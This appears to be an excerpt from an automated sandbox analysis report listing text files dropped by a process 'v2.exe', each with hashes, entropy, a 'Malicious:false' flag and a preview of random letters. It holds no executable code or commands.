                                                                                                                                                                                                                                    Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                    MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                    SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                    SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                    SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.692990330209164
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                                                                                                                                                                                                    MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                                                                                                                                                                                                    SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                                                                                                                                                                                                    SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                                                                                                                                                                                                    SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.697771666106845
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
                                                                                                                                                                                                                                    MD5:D910958AF930D9DCA27D8F529EC053D0
                                                                                                                                                                                                                                    SHA1:321478679C760C347743149A323469AD4BFEA87D
                                                                                                                                                                                                                                    SHA-256:C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
                                                                                                                                                                                                                                    SHA-512:0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.696724055101702
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
                                                                                                                                                                                                                                    MD5:1FFF6A639C738561CDC01BD436BA77C1
                                                                                                                                                                                                                                    SHA1:BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
                                                                                                                                                                                                                                    SHA-256:C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
                                                                                                                                                                                                                                    SHA-512:65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                    MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                    SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                    SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                    SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                    MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                    SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                    SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                    SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.697771666106845
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
                                                                                                                                                                                                                                    MD5:D910958AF930D9DCA27D8F529EC053D0
                                                                                                                                                                                                                                    SHA1:321478679C760C347743149A323469AD4BFEA87D
                                                                                                                                                                                                                                    SHA-256:C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
                                                                                                                                                                                                                                    SHA-512:0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\v2.exe
